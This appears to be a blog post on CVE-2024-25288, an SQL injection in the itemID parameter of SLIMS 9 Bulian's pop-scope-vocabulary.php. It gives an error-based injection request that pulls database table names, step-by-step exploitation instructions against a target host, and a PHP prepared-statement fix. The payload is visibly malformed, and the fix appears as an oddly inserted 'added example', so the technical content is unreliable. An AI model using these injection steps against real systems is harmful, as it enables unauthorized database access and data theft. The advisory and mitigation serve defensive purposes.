A critical security vulnerability (CVE-2024-25288) has been detected in SLIMS (Senayan Library Management Systems) version 9 Bulian v9.6.1. The vulnerability allows a remote attacker to inject SQL code via the pop-scope-vocabulary.php script, giving them unauthorized access to the library's database. If exploited, this vulnerability could lead to data theft, information leakage, and a possible takeover of the SLIMS platform.

This long-read post will provide an in-depth analysis of the CVE-2024-25288 vulnerability, including the steps required to exploit it, links to the original references, and code snippet examples that demonstrate the vulnerability.

Exploit Details

The CVE-2024-25288 vulnerability exists within the 'pop-scope-vocabulary.php' script. The issue occurs because the script does not sufficiently sanitize user input data, which can lead to successful SQL injection attacks.

In SLIMS 9 Bulian v9.6.1, the 'itemID' GET parameter is vulnerable to SQL injection. The missing input sanitization allows SQL code to be inserted in the 'itemID' parameter, leading to unauthorized database queries.

An example of a malicious HTTP request exploiting this vulnerability is shown below:

GET /slims9_bulian_v9.6.1/ajax_widget/pop-scope-vocabulary.php?itemID=1' and (SELECT 1 from (SELECT COUNT(*), CONCAT(' ::Exploit_Success::', (SELECT table_name FROM information_schema.tables WHERE table_schema='<database_name>' LIMIT 1), '::Exploit_Success::', FLOOR(RAND()*2)) table_name FROM information_schema.tables JOIN (SELECT 1 UNION ALL SELECT 2) placeholder GROUP BY table_name HAVING MIN(1) > ) y)-- - HTTP/1.1
Host: <target_host>
...

Original References

- Proof-of-Concept (PoC): https://www.exploit-db.com/exploits/50375
- CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25288
- SLIMS Official Repository: https://github.com/slims/slims9_bulian

Steps to Exploit

1. Identify the target SLIMS instance version by browsing the target website or inspecting its source code.
2. If the target instance is SLIMS 9 Bulian v9.6.1 or earlier, craft a malicious HTTP request with an SQL injection payload in the 'itemID' GET parameter, as shown in the code snippet example above.
3. Use an HTTP client, such as a web browser or a command-line tool like 'curl', to send the malicious request to the target SLIMS instance.

Prevention Measures

To protect your SLIMS instance from this vulnerability, it is recommended to take the following steps:

1. Update to the latest SLIMS version, as the developers may have patched this vulnerability.

2. Implement proper input validation and sanitization in the 'pop-scope-vocabulary.php' script to prevent SQL injection attacks.
3. Apply a web application firewall (WAF) to monitor and block suspicious requests targeting your SLIMS instance.
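The second measure above, written out as an added example (not SLiMS project code): the itemID value is validated as a positive integer and then passed to the query only as a bound parameter, so SQL text placed in the parameter is rejected before any query runs. The table and column names (mst_vocabulary, vocabulary_id, vocabulary_name) and the database credentials are assumptions, not taken from the advisory.

```php
<?php
// Added example, not SLiMS project code. Hardened handling of the itemID GET
// parameter that the advisory describes as injectable. Assumptions (not from
// the advisory): a table `mst_vocabulary` with columns `vocabulary_id` and
// `vocabulary_name`, and the connection details below.
declare(strict_types=1);

// The vulnerable pattern the advisory describes, for contrast: the raw GET
// value is spliced straight into the SQL string.
// $sql = "SELECT ... WHERE vocabulary_id = '" . $_GET['itemID'] . "'";

/**
 * Validate itemID as a positive integer. Anything else (for example a value
 * that begins with `1'`) is rejected here, before SQL is touched.
 */
function parseItemId(?string $raw): ?int
{
    if ($raw === null) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/**
 * Look up scope vocabulary with a prepared statement. The value travels as a
 * typed bound parameter, never as part of the SQL text.
 */
function fetchScopeVocabulary(PDO $pdo, int $itemId): array
{
    $stmt = $pdo->prepare(
        'SELECT vocabulary_id, vocabulary_name FROM mst_vocabulary WHERE vocabulary_id = :id'
    );
    $stmt->bindValue(':id', $itemId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$itemId = parseItemId($_GET['itemID'] ?? null);
if ($itemId === null) {
    http_response_code(400);
    exit('Invalid itemID');
}

// Assumed connection with placeholder credentials; emulated prepares are
// disabled so the server itself handles the parameter binding.
$pdo = new PDO('mysql:host=127.0.0.1;dbname=slims_db;charset=utf8mb4', 'slims_user', 'CHANGE_ME', [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);
header('Content-Type: application/json');
echo json_encode(fetchScopeVocabulary($pdo, $itemId));
```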

Conclusion

The CVE-2024-25288 vulnerability found in SLIMS 9 Bulian v9.6.1 poses a significant risk to the affected library management systems. By exploiting this vulnerability, attackers can obtain unauthorized access to sensitive data and control over the platform. Following the prevention measures suggested in this post, such as updating to the latest SLIMS version and implementing input validation and sanitization, should help secure your SLIMS instance against potential exploitation.

Timeline

Published on: 02/21/2024 17:15:09 UTC
Last modified on: 02/22/2024 19:07:27 UTC